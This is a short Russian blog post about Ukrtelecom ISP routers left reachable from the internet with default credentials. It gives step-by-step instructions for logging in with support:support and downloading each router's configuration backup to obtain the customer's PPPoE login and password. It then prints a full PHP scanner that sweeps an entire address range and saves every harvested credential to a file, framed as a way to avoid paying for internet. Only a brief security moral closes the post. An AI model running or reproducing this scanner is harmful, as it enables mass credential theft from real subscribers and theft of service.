Модем Укртелекома или как не нужно настраивать роутер

Слыхали об роутерах от Укртелекома за 1 гривну? Тогда мы идём к вам!

Бувально пару часов назад я заметил, что роутеры Укртелекома доступны из сети и при заходе по их ip доступна панель управления роутером и telnet.

Первой мыслью было одно — найти стандартный пароль для таких роутеров.
После минутного поиска цель была достигнута, логин: пароль — support:support.
Ввожу данные в форму и, как не странно, открывается web-панель управления:

Дальнейшее действие — получить данные от PPPoE соединения: переходим в «Management» -> «Settings» -> «Backup» -> нажимаем «Backup settings». После этих действий в ваших руках оказывается XML-файл, в котором содержатся все настройки роутера, в ком числе логин и пароль от PPPoE.

Но на этом плюшки не заканчиваются! Следующая мысль — написать сканер подсети.
Пример кода ниже:

<?php set_time_limit(0); $access = 'support:support'; // логин:пароль $one = '93.113'; // начало подсети (без точки)  function backup($ip, $access) { 	$curl = curl_init(); curl_setopt($curl, CURLOPT_URL, 'http://'.$ip.'/backupsettings.conf'); 	curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate'); 	curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); 	// curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 1); 	curl_setopt($curl, CURLOPT_CONNECTTIMEOUT_MS, 200); 	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 	curl_setopt($curl, CURLOPT_USERPWD, $access); 	$buffer = curl_exec($curl); curl_close($curl); 	if(!empty($buffer)) 	{ 		return simplexml_load_string($buffer)->InternetGatewayDevice->WANDevice->WANConnectionDevice->WANPPPConnection; 	} 	else return false; }  for($a = 1; $a < 256; $a++){ // генерация цифер после второй точки 	for($b = 1; $b < 256; $b++){ // генерация цифер после третьей точки 		$file = backup($one.'.'.$a.'.'.$b, $access); // запрос к роутеру 		if($file)  		{ 			$save = fopen('login.txt', 'a+'); 			fwrite($save, $file->Username.':'.$file->Password."\n"); // запись в файл 			fclose($save); 		} 	} } ?> 

Вот и всё, за интернет можно не платить.

Исходя из этого всего нужно сделать выводы:
1. Правильная настройка роутера и свежая прошивка — защита от мошенников.
2. Скупой платит дважды.